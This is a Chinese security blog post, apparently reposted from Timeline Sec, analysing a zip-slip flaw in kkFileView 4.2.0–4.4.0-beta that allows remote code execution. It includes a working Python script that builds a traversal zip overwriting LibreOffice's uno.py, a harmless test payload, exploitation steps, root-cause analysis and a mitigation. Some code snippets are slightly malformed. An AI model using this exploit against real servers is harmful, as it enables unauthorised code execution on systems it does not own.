kkFileView文件上传导致远程代码执行漏洞

关注我们❤️,添加星标🌟,一起学安全!
作者:niko@Timeline Sec
本文字数:1774
阅读时长:2~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

Keking kkFileView是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。kkFileViewv4.2.0至v4.4.0-beta版本之间存在安全漏洞,该漏洞源于组件CompressFilePreviewImpl#filePreviewHandle存在zipslip漏洞,允许攻击者通过将精心制作的zip压缩包来覆盖任意文件,进而造成RCE危害。

0x02 漏洞概述

kkFileViewv4.2.0至v4.4.0-beta版本之间存在安全漏洞,该漏洞源于组件CompressFilePreviewImpl#filePreviewHandle存在zipslip漏洞,允许攻击者通过将精心制作的zip压缩包来覆盖任意文件,进而造成RCE危害。

0x03 影响版本

v4.2.0<= kkFileView <= v4.4.0-beta

0x04 环境搭建

kkFileView文件上传导致远程代码执行漏洞

linux压缩包地址如下:

https://resource.kkview.cn/kkFileView-4.3.0.tar.gz

0x05 漏洞利用

三个文件:zip.py exp.txt sec.txt

同目录保存文件如下,其中sec.txt为任意内容即可:

kkFileView文件上传导致远程代码执行漏洞zip.py

import zipfile

zipName = r"exp.zip"
fileName = r"sec.txt"
fileName2 = r"exp.txt"
zf = zipfile.ZipFile(zipName, 'w')
zf.write(fileName,'sec.txt'#fileName 文件名,sec.txt 压缩路径名称
zf.write(fileName2,'../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py'
zf.close()

exp.txt:rce命令内容为创建/tmp/rce文件夹

import os
os.makedirs("/tmp/rce", exist_ok=True)

此时/tmp文件夹中无内容

kkFileView文件上传导致远程代码执行漏洞

python3 zip.py生成exp.zip,上传zip压缩包后,点击预览

kkFileView文件上传导致远程代码执行漏洞

创建一个odt后缀文件,内容随意。上传后点击预览

kkFileView文件上传导致远程代码执行漏洞
kkFileView文件上传导致远程代码执行漏洞

成功执行命令

kkFileView文件上传导致远程代码执行漏洞

0x06 漏洞分析

zipslip分析

因为在线文件预览无法在线预览其他url的zip文件,所以漏洞率先定位到文件上传处 文件上传接口cn.keking.web.controller.FileController#fileUpload在58行会调用fileUploadCheck函数对文件类型、文件名及是否为同名文件做安全检查,这里我们上传文件为zip能正常通过,因此不继续跟进 68-70行实现文件上传,此时文件被上传至fileDir+demoPath路径下

kkFileView文件上传导致远程代码执行漏洞

分析在线预览接口cn.keking.web.controller.OnlinePreviewController#onlinePreview函数,步入62行

kkFileView文件上传导致远程代码执行漏洞

入参url通过WebUtils.decodeUrl解密(普通的base64解码)

kkFileView文件上传导致远程代码执行漏洞

解码后的fileurl传入至67行

fileHandlerService.getFileAttribute函数中,该函数内容为通过url来获取文件各项属性,如文件类型、文件名、缓存信息等,并返回FileAttribute

kkFileView文件上传导致远程代码执行漏洞

当预览的是zip压缩包时,FileAttribute.typeCOMPRESS

判断代码如下:

public enum FileType {

    COMPRESS("compressFilePreviewImpl"),
    ...
    // 匹配后缀是否在ARCHIVE_TYPES列表中
    private static final String[] ARCHIVE_TYPES = {"rar""zip""jar""7-zip""tar""gzip""7z"};
    private static final Map<String, FileType> FILE_TYPE_MAPPER = new HashMap<>();
    ...
    static {
        for (String archive : ARCHIVE_TYPES) {
            FILE_TYPE_MAPPER.put(archive, FileType.COMPRESS);
        }
    }
x`
kkFileView文件上传导致远程代码执行漏洞

因此在filePreview.filePreviewHandle接口会调用CompressFilePreviewImpl#filePreviewHandle实现类

kkFileView文件上传导致远程代码执行漏洞

后续定位到cn.keking.service.impl.CompressFilePreviewImpl#filePreviewHandle,先步入45行DownloadUtils#downLoad

kkFileView文件上传导致远程代码执行漏洞

当文件为压缩包时,直接返回fileDir + fileNameresponse,不进行文件下载(也就是最开始说的需要先进行文件上传才行)

kkFileView文件上传导致远程代码执行漏洞

之后,response会将地址传递至cn.keking.service.CompressFileReader#unRar作为解压路径

kkFileView文件上传导致远程代码执行漏洞

当我们传入构造好的zipslip压缩包,会发现unRar函数未对解压路径进行处理,因此可以直接将文件通过路径穿越解压到任意文件夹下

kkFileView文件上传导致远程代码执行漏洞

rce浅析

当我们上传odt类型文件并预览时,会调用Libreoffice库中的uno.py文件。该文件默认地址位于:/opt/libreoffice7.5/program/uno.py那么利用方式就是将poc解压到该文件下,即可执行恶意代码(解压后会追加文件内容,不会造成文件覆盖)

kkFileView文件上传导致远程代码执行漏洞

坑点:

构造的zipslip压缩包需要包含一个正常文件。在漏洞挖掘时,初次使用的zipslip代码为

import zipfile
# the name of the zip file to generate
zf = zipfile.ZipFile('wrong2.zip''w')
the name of the malicious file that will overwrite the origial file (must exist on disk)
fname 
'sec.txt'
#destination path of the file
zf.write(fname, '../../../../../../../../../../../../../../../../../tmp/secs.txt')

这时unRar函数会创建如下文件夹,在../作用下,实际创建文件夹为/tmp,并没有创建wrong2.zip_文件夹,因此就导致了FIleNotFoundException

kkFileView文件上传导致远程代码执行漏洞

kkFileView文件上传导致远程代码执行漏洞当zip压缩包包含一个正常文件时,会成功创建对应文件夹

kkFileView文件上传导致远程代码执行漏洞

0x07修复方式

存量受影响的版本建议开启 file.upload.disable=true 参数,禁用首页的上传文件,关闭演示入口来规避问题,等待新版本修复。

参考链接

https://github.com/luelueking/kkFileView-v4.3.0-RCE-POC?tab=readme-ov-file

历史漏洞

CVE-2022-36593-前台-POC已公开

CVE-2021-43734-前台-POC已公开

kkFileView文件上传导致远程代码执行漏洞


回复【加群】进入微信交流群
回复【SRC群】进入SRC-QQ交流群
回复【新人】领取新人学习指南资料
回复【面试】获取渗透测试常见面试题
回复【合作】获取各类安全项目合作方式
回复【帮会】付费加入SRC知识库学习
回复培训】获取官方直播精品课程详情


视频号:搜索TimelineSec

官方微博:#小程序://微博/tPbUYdN9EucSD4C

哔哩哔哩:https://space.bilibili.com/524591903


觉得有用就收藏起来吧!
顺便点个赞和在看
kkFileView文件上传导致远程代码执行漏洞

原文始发于微信公众号(Timeline Sec):kkFileView文件上传导致远程代码执行漏洞

版权声明:admin 发表于 2024年4月29日 下午6:31。
转载请注明:kkFileView文件上传导致远程代码执行漏洞 | CTF导航

相关文章